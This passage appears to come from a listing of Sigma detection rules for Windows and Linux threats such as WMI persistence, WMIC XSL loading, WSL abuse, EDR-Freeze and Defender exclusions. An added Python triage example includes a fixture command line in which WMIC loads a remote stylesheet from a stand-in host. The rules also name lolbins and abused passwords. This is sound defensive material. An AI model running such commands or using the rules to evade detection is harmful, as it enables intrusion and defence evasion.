selection:
TargetObject|contains: '\BFE\Parameters\Policy\Persistent\Filter\'
filter_main_svchost:
Image:
- 'C:\Windows\System32\svchost.exe'
- 'C:\Windows\SysWOW64\svchost.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
medium
Strong
Medium FP
WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load
Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs, which could indicate WMI ActiveScriptEventConsumers activity.
title: WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load
id: b439f47d-ef52-4b29-9a2f-57d8a96cb6b8
status: test
description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs, which could indicate WMI ActiveScriptEventConsumers activity.
references:
- https://twitter.com/HunterPlaybook/status/1301207718355759107
- https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/
- https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-09-02
modified: 2023-02-22
tags:
- attack.lateral-movement
- attack.privilege-escalation
- attack.persistence
- attack.t1546.003
logsource:
category: image_load
product: windows
detection:
selection:
Image|endswith: '\scrcons.exe'
ImageLoaded|endswith:
- '\vbscript.dll'
- '\wbemdisp.dll'
- '\wshom.ocx'
- '\scrrun.dll'
condition: selection
falsepositives:
- Legitimate event consumers
- Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button
level: medium
medium
Moderate
Medium FP
WMI Persistence - Script Event Consumer
Detects WMI script event consumers
title: WMI Persistence - Script Event Consumer
id: ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e
status: test
description: Detects WMI script event consumers
references:
- https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
author: Thomas Patzke
date: 2018-03-07
modified: 2022-10-11
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1546.003
logsource:
category: process_creation
product: windows
detection:
selection:
Image: C:\WINDOWS\system32\wbem\scrcons.exe
ParentImage: C:\Windows\System32\svchost.exe
condition: selection
falsepositives:
- Legitimate event consumers
- Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button
level: medium
medium
Strong
Medium FP
WMIC Loading Scripting Libraries
Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (containing e.g. JScript or VBScript).
It could be an indicator of the SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.
title: WMIC Loading Scripting Libraries
id: 06ce37c2-61ab-4f05-9ff5-b1a96d18ae32
related:
- id: 8d63dadf-b91b-4187-87b6-34a1114577ea
type: similar
- id: 05c36dd6-79d6-4a9a-97da-3db20298ab2d
type: similar
status: test
description: |
Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (containing e.g. JScript or VBScript).
It could be an indicator of the SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.
references:
- https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html
- https://twitter.com/dez_/status/986614411711442944
- https://lolbas-project.github.io/lolbas/Binaries/Wmic/
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-10-17
modified: 2022-10-13
tags:
- attack.stealth
- attack.t1220
logsource:
category: image_load
product: windows
detection:
selection:
Image|endswith: '\wmic.exe'
ImageLoaded|endswith:
- '\jscript.dll'
- '\vbscript.dll'
condition: selection
falsepositives:
- The commands `wmic os get lastbootuptime`, `wmic os get locale` and `wmic ntevent` load vbscript.dll
- The ImageLoad event alone does not carry enough information in this case. Look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes for more insight
level: medium
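The false-positive notes above say the image_load event on its own is not enough and that the WMIC process's creation record must be consulted. The Python below is an added example, not code from the Sigma project or this page: it joins each DLL-load hit to its process_creation record on `ProcessGuid` (the field Sysmon writes into both event types; if your source uses a different correlation key, substitute it) and sorts the command line into the benign cases the notes list, a `/FORMAT` stylesheet load, or "review". All events, GUIDs and URLs are constructed for the example.

```python
SCRIPT_DLLS = ("\\jscript.dll", "\\vbscript.dll")
# Command lines the rule's false-positive notes call out as loading vbscript.dll
KNOWN_BENIGN = ("os get lastbootuptime", "os get locale", " ntevent")


def dll_load_hits(image_loads):
    """The rule: wmic.exe loading a scripting engine DLL."""
    return [e for e in image_loads
            if e["Image"].lower().endswith("\\wmic.exe")
            and e["ImageLoaded"].lower().endswith(SCRIPT_DLLS)]


def classify(cmdline):
    """Sort a WMIC command line: stylesheet loads first, then the documented benign verbs."""
    cl = cmdline.lower()
    if "/format" in cl:
        remote = "http://" in cl or "https://" in cl or "\\\\" in cl   # URL or UNC path
        return "remote-xsl" if remote else "local-xsl"
    if any(b in cl for b in KNOWN_BENIGN):
        return "known-benign"
    return "review"


def triage(image_loads, process_creations):
    """Join each DLL-load hit to its process_creation record on ProcessGuid and classify
    the command line; returns (ProcessGuid, verdict, CommandLine or None)."""
    by_guid = {p["ProcessGuid"]: p for p in process_creations}
    rows = []
    for e in dll_load_hits(image_loads):
        p = by_guid.get(e["ProcessGuid"])
        if p is None:
            rows.append((e["ProcessGuid"], "no-process-record", None))
        else:
            rows.append((e["ProcessGuid"], classify(p["CommandLine"]), p["CommandLine"]))
    return rows


# Constructed image_load and process_creation records sharing a ProcessGuid
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
IMAGE_LOADS = [
    {"ProcessGuid": "{A1}", "Image": WMIC, "ImageLoaded": r"C:\Windows\System32\jscript.dll"},
    {"ProcessGuid": "{B2}", "Image": WMIC, "ImageLoaded": r"C:\Windows\System32\vbscript.dll"},
    {"ProcessGuid": "{C3}", "Image": WMIC, "ImageLoaded": r"C:\Windows\System32\vbscript.dll"},
    {"ProcessGuid": "{D4}", "Image": WMIC, "ImageLoaded": r"C:\Windows\System32\vbscript.dll"},
    {"ProcessGuid": "{E5}", "Image": r"C:\Windows\System32\cscript.exe",   # not wmic: no hit
     "ImageLoaded": r"C:\Windows\System32\vbscript.dll"},
]
PROCESS_CREATIONS = [
    {"ProcessGuid": "{A1}", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'wmic os get /FORMAT:"https://files.example.test/sheet.xsl"'},
    {"ProcessGuid": "{B2}", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "wmic os get lastbootuptime"},
    {"ProcessGuid": "{C3}", "ParentImage": r"C:\Users\Public\stage.exe",
     "CommandLine": "wmic process call create calc.exe"},
    # {D4} deliberately has no process_creation record (e.g. a collection gap)
]

if __name__ == "__main__":
    for guid, verdict, cmd in triage(IMAGE_LOADS, PROCESS_CREATIONS):
        print(f"{guid:6} {verdict:18} {cmd}")
```

A missing process record is itself worth a look: the load fired but the creation event did not arrive, which is the kind of gap a tampered sensor produces.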
medium
Moderate
Medium FP
WSL Child Process Anomaly
Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
title: WSL Child Process Anomaly
id: 2267fe65-0681-42ad-9a6d-46553d3f3480
related:
- id: dec44ca7-61ad-493c-bfd7-8819c5faa09b # LOLBIN Rule
type: derived
status: test
description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
references:
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/
- https://twitter.com/nas_bench/status/1535431474429808642
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-23
modified: 2023-08-15
tags:
- attack.execution
- attack.stealth
- attack.t1218
- attack.t1202
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith:
- '\wsl.exe'
- '\wslhost.exe'
selection_children_images:
Image|endswith:
# Add more suspicious/uncommon "lolbin" processes
- '\calc.exe'
- '\cmd.exe'
- '\cscript.exe'
- '\mshta.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\regsvr32.exe'
- '\rundll32.exe'
- '\wscript.exe'
selection_children_paths:
Image|contains:
- '\AppData\Local\Temp\'
- 'C:\Users\Public\'
- 'C:\Windows\Temp\'
- 'C:\Temp\'
- '\Downloads\'
- '\Desktop\'
condition: selection_parent and 1 of selection_children_*
falsepositives:
- Unknown
level: medium
medium
Moderate
High FP
Weak or Abused Passwords In CLI
Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.
An example would be a threat actor creating a new user via the net command and providing the password inline
title: Weak or Abused Passwords In CLI
id: 91edcfb1-2529-4ac2-9ecc-7617f895c7e4
status: test
description: |
Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.
An example would be a threat actor creating a new user via the net command and providing the password inline
references:
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments
- https://thedfirreport.com/2022/09/26/bumblebee-round-two/
- https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/
- https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-14
modified: 2024-02-23
tags:
- attack.execution
- attack.stealth
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
# Add more passwords
- '123456789'
- '123123qwE'
- 'Asd123.aaaa'
- 'Decryptme'
- 'P@ssw0rd!'
- 'Pass8080'
- 'password123' # Also covers PASSWORD123123! as seen in https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/
- 'test@202' # Covers multiple years
condition: selection
falsepositives:
- Legitimate usage of the passwords by users via commandline (should be discouraged)
- Other currently unknown false positives
level: medium
medium
Strong
Medium FP
WebDAV Temporary Local File Creation
Detects the creation of WebDAV temporary files with potentially suspicious extensions
title: WebDAV Temporary Local File Creation
id: 4c55738d-72d8-490e-a2db-7969654e375f
related:
- id: 1ae64f96-72b6-48b3-ad3d-e71dff6c6398
type: similar
status: test
description: Detects the creation of WebDAV temporary files with potentially suspicious extensions
references:
- https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html
- https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462
- https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4
author: Micah Babinski
date: 2023-08-21
tags:
- attack.initial-access
- attack.resource-development
- attack.t1584
- attack.t1566
- detection.threat-hunting
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|contains: '\AppData\Local\Temp\TfsStore\Tfs_DAV\'
TargetFilename|endswith:
- '.7z'
- '.bat'
- '.dat'
- '.ico'
- '.js'
- '.lnk'
- '.ps1'
- '.rar'
- '.vbe'
- '.vbs'
- '.zip'
condition: selection
falsepositives:
- Legitimate use of WebDAV in an environment
level: medium
medium
Moderate
Medium FP
WerFaultSecure Loading DbgCore or DbgHelp - EDR-Freeze
Detects the loading of dbgcore.dll or dbghelp.dll by WerFaultSecure.exe, which has been observed in EDR-Freeze attacks to suspend processes and evade detection.
However, this behavior has also been observed during normal software installations, so further investigation is required to confirm malicious activity.
When threat hunting, look for this activity in conjunction with other suspicious processes starting, network connections, or file modifications that occur shortly after the DLL load.
Pay special attention to timing - if other malicious activities occur during or immediately after this library loading, it may indicate EDR evasion attempts.
Also correlate with any EDR/AV process suspension events or gaps in security monitoring during the timeframe.
title: WerFaultSecure Loading DbgCore or DbgHelp - EDR-Freeze
id: 8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b
related:
    - id: 387df17d-3b04-448f-8669-9e7fd5e5fd8c
      type: similar
    - id: 1f0b4cac-9c81-41f4-95d0-8475ff46b3e2
      type: similar
status: experimental
description: |
    Detects the loading of dbgcore.dll or dbghelp.dll by WerFaultSecure.exe, which has been observed in EDR-Freeze attacks to suspend processes and evade detection.
    However, this behavior has also been observed during normal software installations, so further investigation is required to confirm malicious activity.
    When threat hunting, look for this activity in conjunction with other suspicious processes starting, network connections, or file modifications that occur shortly after the DLL load.
    Pay special attention to timing - if other malicious activities occur during or immediately after this library loading, it may indicate EDR evasion attempts.
    Also correlate with any EDR/AV process suspension events or gaps in security monitoring during the timeframe.
references:
    - https://github.com/TwoSevenOneT/EDR-Freeze
    - https://blog.axelarator.net/hunting-for-edr-freeze/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-11-27
modified: 2026-01-09
tags:
    - attack.defense-impairment
    - attack.t1685
    - detection.threat-hunting
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image|endswith: '\WerFaultSecure.exe'
        ImageLoaded|endswith:
            - '\dbgcore.dll'
            - '\dbghelp.dll'
    condition: selection
falsepositives:
    - Unknown
level: medium
regression_tests_path: regression_data/rules-threat-hunting/windows/image_load/image_load_win_werfaultsecure_dbgcore_dbghelp_load/info.yml
medium
Strong
Medium FP
Wget Creating Files in Tmp Directory
Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
title: Wget Creating Files in Tmp Directory
id: 35a05c60-9012-49b6-a11f-6bab741c9f74
status: test
description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
references:
    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-06-02
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    product: linux
    category: file_event
detection:
    selection:
        Image|endswith: '/wget'
        TargetFilename|startswith:
            - '/tmp/'
            - '/var/tmp/'
    condition: selection
falsepositives:
    - Legitimate downloads of files in the tmp folder.
level: medium
medium
Strong
Medium FP
WinSock2 Autorun Keys Modification
Detects modification of autostart extensibility point (ASEP) in registry.
title: WinSock2 Autorun Keys Modification
id: d6c2ce7e-afb5-4337-9ca4-4b5254ed0565
related:
    - id: 17f878b8-9968-4578-b814-c4217fc5768c
      type: derived
status: test
description: Detects modification of autostart extensibility point (ASEP) in registry.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns
    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
date: 2019-10-25
modified: 2023-08-17
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1547.001
logsource:
    category: registry_set
    product: windows
detection:
    winsock_parameters_base:
        TargetObject|contains: '\System\CurrentControlSet\Services\WinSock2\Parameters'
    winsock_parameters:
        TargetObject|contains:
            - '\Protocol_Catalog9\Catalog_Entries'
            - '\NameSpace_Catalog5\Catalog_Entries'
    filter:
        - Details: '(Empty)'
        - Image: 'C:\Windows\System32\MsiExec.exe'
        - Image: 'C:\Windows\syswow64\MsiExec.exe'
    condition: winsock_parameters_base and winsock_parameters and not filter
falsepositives:
    - Legitimate software automatically (mostly during installation) sets up autorun keys for legitimate reasons
    - Legitimate administrators set up autorun keys for legitimate reasons
level: medium
medium
Moderate
Medium FP
WinSxS Executable File Creation By Non-System Process
Detects the creation of binaries in the WinSxS folder by non-system processes
title: WinSxS Executable File Creation By Non-System Process
id: 34746e8c-5fb8-415a-b135-0abc167e912a
related:
    - id: 64827580-e4c3-4c64-97eb-c72325d45399
      type: derived
status: test
description: Detects the creation of binaries in the WinSxS folder by non-system processes
references:
    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-11
tags:
    - attack.execution
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|startswith: 'C:\Windows\WinSxS\'
        TargetFilename|endswith: '.exe'
    filter_main_system_location:
        # 'System32' (not 'Systems32'): a misspelt path here would never match, so
        # System32-hosted processes would not be excluded and the rule would fire on them
        Image|startswith:
            - 'C:\Windows\System32\'
            - 'C:\Windows\SysWOW64\'
            - 'C:\Windows\WinSxS\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium
medium
Moderate
Medium FP
Windows Binary Executed From WSL
Detects the execution of Windows binaries from within a WSL instance.
This could be used to masquerade parent-child relationships
title: Windows Binary Executed From WSL
id: ed825c86-c009-4014-b413-b76003e33d35
status: test
description: |
    Detects the execution of Windows binaries from within a WSL instance.
    This could be used to masquerade parent-child relationships
references:
    - Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-02-14
tags:
    - attack.execution
    - attack.stealth
    - attack.t1202
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|re: '[a-zA-Z]:\\'
        CurrentDirectory|contains: '\\\\wsl.localhost' # Note: programs not supporting UNC paths (example: cmd.exe) will default to another location
    condition: selection
falsepositives:
    - Unknown
level: medium
medium
Moderate
High FP
Windows Defender Exclusions Added - Registry
Detects the setting of Windows Defender exclusions in the registry.
title: Windows Defender Exclusions Added - Registry
id: a982fc9c-6333-4ffb-a51d-addb04e8b529
related:
    - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f
      type: derived
status: test
description: Detects the setting of Windows Defender exclusions in the registry.
references:
    - https://twitter.com/_nullbind/status/1204923340810543109
author: Christian Burkard (Nextron Systems)
date: 2021-07-06
modified: 2023-08-17
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    product: windows
    category: registry_set
detection:
    selection2:
        TargetObject|contains: '\Microsoft\Windows Defender\Exclusions'
    condition: selection2
falsepositives:
    - Administrator actions
level: medium